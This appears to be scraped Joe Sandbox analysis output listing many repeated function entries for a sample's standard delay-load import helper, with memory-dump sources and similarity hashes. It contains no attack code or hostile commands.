                                                                                                                    • Instruction ID: 74721b4bea3f5fa3b45723c77f08ad65b026290775fc07003200627887209f90
                                                                                                                    • Opcode Fuzzy Hash: b2d7b9a5bcb2610d254a73c1f248936b0575ad1a19068a33e2779b5d9a787372
                                                                                                                    • Instruction Fuzzy Hash: 38B012E12DB240BC358862163C03C37014DD0C8B10330713FFC56F0380D8407C440531
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: c43cc4f8d2d75daaab5c97864c0603e489b6df2dae49117325f58868277e0815
                                                                                                                    • Instruction ID: eaa30482c825dbd5611059e4aafd76c4378ccc0964acb8939677f59b5a1d665e
                                                                                                                    • Opcode Fuzzy Hash: c43cc4f8d2d75daaab5c97864c0603e489b6df2dae49117325f58868277e0815
                                                                                                                    • Instruction Fuzzy Hash: CFB012E12DA200BC358861163C07C37014CD0C8F50330713FF856F0380D8407D400531
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-3618818622
• Opcode ID: 64e4d371445868e41cae8076b917d660b162f8624974977c22866c9c3f7ea4fb
• Instruction ID: ee93728311cbcd7b3482c1ba8818aae728fd51c12af7bd428acb5530ef7afab4
• Opcode Fuzzy Hash: 64e4d371445868e41cae8076b917d660b162f8624974977c22866c9c3f7ea4fb
• Instruction Fuzzy Hash: 4DB012E12DA100AC354861163D07C37014CD0C8F10330703EF856F0380DC407E010531
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-3618818622
• Opcode ID: dba93d929b9f63a8e00463e1565a9984c0a0efc81671e7b5a7615c33cdffcd92
• Instruction ID: 6765255a7bebcea2f68f8f6d9b8b9ac57c92ff1965c6b7305324d8b6837246dc
• Opcode Fuzzy Hash: dba93d929b9f63a8e00463e1565a9984c0a0efc81671e7b5a7615c33cdffcd92
• Instruction Fuzzy Hash: 07B012E12DA100AC354861173C07C37014CE0C8F10330703EF856F0390D8407D000531
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-3618818622
• Opcode ID: baa84c6f95c2b67d53439f27fe2d70279c49d88d6fd7018b95dc8f297ceff774
• Instruction ID: d7b6f301cf38830348c1622c7abc781fd9bfc38b6b49c73b6a3924f4d0ae39bf
• Opcode Fuzzy Hash: baa84c6f95c2b67d53439f27fe2d70279c49d88d6fd7018b95dc8f297ceff774
• Instruction Fuzzy Hash: 0FB012D13DA240BC358862163C03C3B014CD0C8B10330B23FF856F0380D8407C440531
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-3618818622
• Opcode ID: 8700e26e1beb416f942dd4dfceec3d4938dd7852b88df1ceb830b4770bb6c606
• Instruction ID: 68ed3623490c0fd99567607b399f786fac81aad3421d4f0dcd2ae1d827474411
• Opcode Fuzzy Hash: 8700e26e1beb416f942dd4dfceec3d4938dd7852b88df1ceb830b4770bb6c606
• Instruction Fuzzy Hash: 7FB012D12DE100AC354862163D03C3B014CD0C8B10330B13EF856F0380DC507D090531
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-3618818622
• Opcode ID: cb9793b178b250a92b4bb33def026593b3928a4c72598865dbcca6161895caed
• Instruction ID: ac877f1892f778fdd2862baaebaa626b1b336ec32b35d6db014645264a1af8e8
• Opcode Fuzzy Hash: cb9793b178b250a92b4bb33def026593b3928a4c72598865dbcca6161895caed
• Instruction Fuzzy Hash: 7CB012E52DA100BC354861163C07C37014CD0C9F10330B03EFC56F0380D840BD000531
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E580
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: Fjun
• API String ID: 1269201914-1717936292
• Opcode ID: 98cb34341fdb3bc7fcf85808fcfa89fd11d7a7f39871a8e8a24ef0d28ea975a8
• Instruction ID: 58f96793fa710492e02795269d85ce02b30e7449d6af6fb22a1e09afedc7ea23
• Opcode Fuzzy Hash: 98cb34341fdb3bc7fcf85808fcfa89fd11d7a7f39871a8e8a24ef0d28ea975a8
• Instruction Fuzzy Hash: DBB012C129A1007C35086265BD03C3F015CE0C4F20334732EF406F1280EC400D010539
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E580
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: Fjun
• API String ID: 1269201914-1717936292
• Opcode ID: 9d7ab2cd262432f5d9bdc29b4994ac6aecff327729d8c628115831ba20b10192
• Instruction ID: cac64f9d0c6216d5c428c4114a7a2c45daaaa13c702084cc907d443191fab517
• Opcode Fuzzy Hash: 9d7ab2cd262432f5d9bdc29b4994ac6aecff327729d8c628115831ba20b10192
• Instruction Fuzzy Hash: 2BB012C129A2007C35486265BC03C3B015CE0C4F20334732FF406F1280E8400C400535
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E580
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: Fjun
• API String ID: 1269201914-1717936292
• Opcode ID: a0639621bcab85381877fca91d94e06025cc0b606b71321ac26990c6afa63bc4
• Instruction ID: 20ad95279d365ad10fb337e7831367e5d1a66fa84db50d8b1ecd58c5524c21db
• Opcode Fuzzy Hash: a0639621bcab85381877fca91d94e06025cc0b606b71321ac26990c6afa63bc4
• Instruction Fuzzy Hash: 4CB012C129A1007D350862657C03C7B014CF0C4F20330712EF405F1690E8400C000535
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E51F
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: PDu<
• API String ID: 1269201914-576538559
• Opcode ID: 158f9d68ac1324b3db47ab144cf80e988c3bb339667b1d6274db97e4659d6702
• Instruction ID: 622bc162dd5b517d65702b44eaf5cb1a1d33fcb947195469972cf25e465b0e0c
• Opcode Fuzzy Hash: 158f9d68ac1324b3db47ab144cf80e988c3bb339667b1d6274db97e4659d6702
• Instruction Fuzzy Hash: 0AB012C16982007C3A086119BC03C3F014DD4C5F10330722EF406F0280E8401C440536
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E51F
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: PDu<
• API String ID: 1269201914-576538559
• Opcode ID: 9a882ffd314e9b59fe5e3c92628b12db03783b2a6179970ecc9a5951b788c434
• Instruction ID: 33818cef75e3ce9e23a8b3353abeee79cd7cbf85b543649bf9d4813a50de9844
• Opcode Fuzzy Hash: 9a882ffd314e9b59fe5e3c92628b12db03783b2a6179970ecc9a5951b788c434
• Instruction Fuzzy Hash: 4CB012C16981007C390821357C07C3F010EE4C1F10330703EF451F0581A8401D040432
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-3618818622
• Opcode ID: 633728d969721cf3f8346a44815ddc10f8c3fff5e01f0d856d8842df69080d1b
• Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
• Opcode Fuzzy Hash: 633728d969721cf3f8346a44815ddc10f8c3fff5e01f0d856d8842df69080d1b
• Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-3618818622
• Opcode ID: 4b582fcaced4b62e7885ae2eaeb6c79e236cb08a4249b671294a710b65966d26
• Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
• Opcode Fuzzy Hash: 4b582fcaced4b62e7885ae2eaeb6c79e236cb08a4249b671294a710b65966d26
• Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-3618818622
• Opcode ID: 0cbc345199f970fb595ee3a8e2fde8615b5d9d86f3cc2fefe7c9247ca20d94ae
• Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
• Opcode Fuzzy Hash: 0cbc345199f970fb595ee3a8e2fde8615b5d9d86f3cc2fefe7c9247ca20d94ae
• Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-3618818622
• Opcode ID: 0a8ede8c57d9705a73547bbf166d795fc03dd307e84144c0aa4cfa229ee8b5d8
• Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
• Opcode Fuzzy Hash: 0a8ede8c57d9705a73547bbf166d795fc03dd307e84144c0aa4cfa229ee8b5d8
• Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: e17706c963f4320e01e56a0b706851ff2819f5dced3f89ec89f36700eaf445ce
                                                                                                                    • Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
                                                                                                                    • Opcode Fuzzy Hash: e17706c963f4320e01e56a0b706851ff2819f5dced3f89ec89f36700eaf445ce
                                                                                                                    • Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
